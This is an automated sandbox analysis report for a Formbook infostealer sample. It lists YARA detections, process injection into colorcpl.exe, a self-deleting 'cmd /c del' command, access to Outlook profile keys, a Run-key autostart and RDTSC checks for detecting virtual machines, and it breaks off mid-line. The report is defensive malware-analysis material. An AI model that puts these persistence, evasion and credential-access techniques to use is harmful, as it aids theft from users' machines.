          Source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Scn14.092020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@14/11
          Source: C:\Users\user\Desktop\Scn14.092020.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scn14.092020.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_01
          Source: Scn14.092020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Scn14.092020.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Scn14.092020.exeVirustotal: Detection: 20%
          Source: unknownProcess created: C:\Users\user\Desktop\Scn14.092020.exe 'C:\Users\user\Desktop\Scn14.092020.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Scn14.092020.exe C:\Users\user\Desktop\Scn14.092020.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scn14.092020.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess created: C:\Users\user\Desktop\Scn14.092020.exe C:\Users\user\Desktop\Scn14.092020.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scn14.092020.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Scn14.092020.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Scn14.092020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: wntdll.pdbUGP source: Scn14.092020.exe, 00000001.00000002.275241278.000000000144F000.00000040.00000001.sdmp, colorcpl.exe, 00000005.00000002.500174223.0000000004A30000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Scn14.092020.exe, 00000001.00000002.275241278.000000000144F000.00000040.00000001.sdmp, colorcpl.exe

          Data Obfuscation:

          barindex
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xD599EBD7 [Sat Jul 24 05:59:51 2083 UTC]
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004148E6 push es; retf 1_2_004148ED
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00414977 push esi; ret 1_2_00414978
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004149C5 pushfd ; iretd 1_2_004149C6
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041AB42 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417C73 push cs; retf 1_2_00417C7E
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AAD0D1 push ecx; ret 5_2_04AAD0E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A548E6 push es; retf 5_2_00A548ED
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A549C5 pushfd ; iretd 5_2_00A549C6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A54977 push esi; ret 5_2_00A54978
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5AAF5 push eax; ret 5_2_00A5AB48
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5ABAC push eax; ret 5_2_00A5ABB2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5AB42 push eax; ret 5_2_00A5AB48
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5AB4B push eax; ret 5_2_00A5ABB2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57C73 push cs; retf 5_2_00A57C7E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A54E46 push 76AC60C6h; retf 5_2_00A54E4B
          Source: initial sampleStatic PE information: section name: .text entropy: 7.95430334165

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\SysWOW64\colorcpl.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run L63DUFWXGVEJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Scn14.092020.exeRDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Scn14.092020.exeRDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First addres